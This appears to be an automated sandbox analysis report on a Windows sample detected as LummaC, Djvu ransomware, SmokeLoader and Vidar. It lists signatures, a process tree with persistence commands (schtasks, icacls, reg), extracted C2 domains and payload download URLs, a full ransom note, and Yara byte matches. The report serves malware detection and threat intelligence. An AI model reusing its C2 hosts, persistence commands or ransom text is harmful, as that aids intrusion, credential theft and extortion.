Edit tour

Windows Analysis Report
SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe

Overview

General Information

Sample name:	SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe
Analysis ID:	1420308
MD5:	e478a6638150036e4009beb1530187bb
SHA1:	6c49c874ba692a84f8ebd46c2cdab07aca026ce4
SHA256:	a78b39de8c05456e93a88136f9caaee35e9b5149acf072acd3214b28293c7910
Tags:	exe
Infos:

Detection

LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Found ransom note / readme

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected Babuk Ransomware

Yara detected Clipboard Hijacker

Yara detected Djvu Ransomware

Yara detected LummaC Stealer

Yara detected SmokeLoader

Yara detected Vidar

Yara detected Vidar stealer

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Found many strings related to Crypto-Wallets (likely being stolen)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies existing user documents (likely ransomware behavior)

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses cmd line tools excessively to alter registry or file data

Uses schtasks.exe or at.exe to add and modify task schedules

Writes a notice file (html or txt) to demand a ransom

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe (PID: 7640 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe" MD5: E478A6638150036E4009BEB1530187BB)

explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

cmd.exe (PID: 8020 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 8072 cmdline: reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

1601.exe (PID: 8176 cmdline: C:\Users\user\AppData\Local\Temp\1601.exe MD5: B925392616A0AD9C3FCDE0F5BD7EF7A1)

1601.exe (PID: 5136 cmdline: C:\Users\user\AppData\Local\Temp\1601.exe MD5: B925392616A0AD9C3FCDE0F5BD7EF7A1)

icacls.exe (PID: 7432 cmdline: icacls "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)

1601.exe (PID: 7536 cmdline: "C:\Users\user\AppData\Local\Temp\1601.exe" --Admin IsNotAutoStart IsNotTask MD5: B925392616A0AD9C3FCDE0F5BD7EF7A1)

1601.exe (PID: 3944 cmdline: "C:\Users\user\AppData\Local\Temp\1601.exe" --Admin IsNotAutoStart IsNotTask MD5: B925392616A0AD9C3FCDE0F5BD7EF7A1)

build2.exe (PID: 2636 cmdline: "C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe" MD5: 4FBDCB0EE049B71CB8B9A68BF69F9E0E)

build2.exe (PID: 7712 cmdline: "C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe" MD5: 4FBDCB0EE049B71CB8B9A68BF69F9E0E)

build3.exe (PID: 3076 cmdline: "C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe" MD5: 41B883A061C95E9B9CB17D4CA50DE770)

build3.exe (PID: 4460 cmdline: "C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe" MD5: 41B883A061C95E9B9CB17D4CA50DE770)

schtasks.exe (PID: 4576 cmdline: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

455F.exe (PID: 3688 cmdline: C:\Users\user\AppData\Local\Temp\455F.exe MD5: 9E52AA572F0AFC888C098DB4C0F687FF)

cmd.exe (PID: 2044 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4DCC.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 2216 cmdline: reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

1601.exe (PID: 3108 cmdline: "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart MD5: B925392616A0AD9C3FCDE0F5BD7EF7A1)

1601.exe (PID: 3952 cmdline: "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart MD5: B925392616A0AD9C3FCDE0F5BD7EF7A1)

1601.exe (PID: 5068 cmdline: "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart MD5: B925392616A0AD9C3FCDE0F5BD7EF7A1)

1601.exe (PID: 6044 cmdline: "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart MD5: B925392616A0AD9C3FCDE0F5BD7EF7A1)

WerFault.exe (PID: 5288 cmdline: C:\Windows\system32\WerFault.exe -u -p 3968 -s 11016 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

fcbhtea (PID: 7992 cmdline: C:\Users\user\AppData\Roaming\fcbhtea MD5: E478A6638150036E4009BEB1530187BB)

1601.exe (PID: 7472 cmdline: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe --Task MD5: B925392616A0AD9C3FCDE0F5BD7EF7A1)

1601.exe (PID: 7496 cmdline: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe --Task MD5: B925392616A0AD9C3FCDE0F5BD7EF7A1)

mstsca.exe (PID: 5088 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

explorer.exe (PID: 6088 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Babuk	Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.	No Attribution	http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/ https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/ https://blog.morphisec.com/babuk-ransomware-variant-major-attack https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/	https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk

Name	Description	Attribution	Blogpost URLs	Link
STOP, Djvu	STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.	No Attribution	https://angle.ankura.com/post/102het9/the-stop-ransomware-variant https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/ https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "problemregardybuiwo.fun", "lighterepisodeheighte.fun", "lighterepisodeheighte.fun", "technologyenterdo.shop", "resergvearyinitiani.shop"], "Build id": "GhJLkO--seevpalpadin"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199662282318"], "Botnet": "1f691793c84445b319605236a41a1e5a", "Version": "8.8"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}

Threatname: Djvu

{"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://sajdfue.com/files/1/build3.exe"], "C2 url": "http://sajdfue.com/test1/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/df01994dd8d37c2c33469922f8e7155a20240402134014/fd95b0\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0859PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw3cFECa7s7mFEyVOGZqu\\\\nMRJuRpDI2E3tQgg2YPK\\/Mf2S8v2ymMAT42I5brWjeBojDbtQaz0JqzCOHWnOZ5\\/L\\\\nqZizpeyGYki4Q6yORuW\\/liWFgC92YGVTYAS8PibPwBHUrbH88LbJCK3GVqwpfPih\\\\n7jx4Ly9QyDO8pfZOjM5s+kffqlkq+yfLY+amAu0x2AisNAlgtO4Wge3w9NH4xiF8\\\\nXPsrqqnLhMKo9PMrN+TDuZqrJGbb7WCEFFt3rkrBRVZVZGxPc0yfja1Fx2NEYXoZ\\\\nfevYakqwPST63ndNugXO6wddQDQHQTEo0zDdvSmXLhZ+ECBoiMkcL8Z3rAdo1\\/BO\\\\nrwIDAQAB\\\\n-----END PUBLIC KEY-----"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1443372000.0000000002F58000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x37c9:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000021.00000002.2169316738.0000000000920000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
00000021.00000002.2169316738.0000000000920000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x27a3:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
00000021.00000002.2169316738.0000000000920000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x249a:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x2527:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x2527:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x284d:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x28d5:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000021.00000002.2170422232.0000000000A0C000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x76c4:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000013.00000002.2287228950.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000022.00000002.1999924732.0000000004827000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000F.00000002.1764359339.0000000004960000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000F.00000002.1764359339.0000000004960000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000011.00000002.2618390493.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000011.00000002.2618390493.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000011.00000002.2618390493.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000000.00000002.1443176232.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000012.00000002.1803546688.0000000000AD1000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1550:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000008.00000002.1720633921.00000000048B5000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001D.00000002.1908200687.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000001D.00000002.1908200687.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000001D.00000002.1908200687.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000000.00000002.1443196159.0000000002D00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1443196159.0000000002D00000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x624:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000F.00000002.1764276371.00000000048C1000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001C.00000002.1898227455.00000000048D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000001C.00000002.1898227455.00000000048D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
